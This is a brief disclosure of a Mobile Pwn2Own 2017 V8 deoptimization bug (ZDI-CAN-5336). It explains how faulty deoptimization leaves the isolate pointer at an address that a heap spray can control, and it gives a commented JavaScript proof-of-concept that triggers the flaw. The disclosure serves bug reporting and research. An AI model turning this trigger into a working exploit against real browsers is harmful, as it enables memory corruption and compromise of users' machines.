Pwn2own: V8 - isolate control via function deoptimization

Original link: bugs.chromium.org

Mobile Pwn2Own 2017 V8 ZDI-CAN-5336 vulnerability PoC

The following bug was disclosed by ZDI during PacSec / Mobile Pwn2Own 2017. Reference: ZDI-CAN-5336

When the function deoptimizes, the V8 engine has to restore the context. In this function the deoptimizer does not work properly: after deoptimization the context is confused with an arguments_marker, and the isolate pointer points to 0x7ff00000. So once we spray memory to control that address, we also control the isolate.

PoC:

    function SDD() {
        function foo() {}
        foo[0] = 0;            // give foo an element (elements backing store)
        foo.prototype = 0;     // replace its prototype with a non-object value

        try {
            throw 0;
        } catch(e) {
            // bar runs inside the catch context; this is the context the
            // deoptimizer later has to restore
            [0].forEach(bar);
        }

        function bar() {
            foo[200];          // out-of-range element read on foo
        }

        // long-running loop so SDD gets optimized (and later deoptimized)
        for (var i = 0; i < 0x2000000; ++i) {}
    }

    // repeated calls so V8 optimizes SDD and hits the faulty deoptimization
    SDD();
    SDD();
    SDD();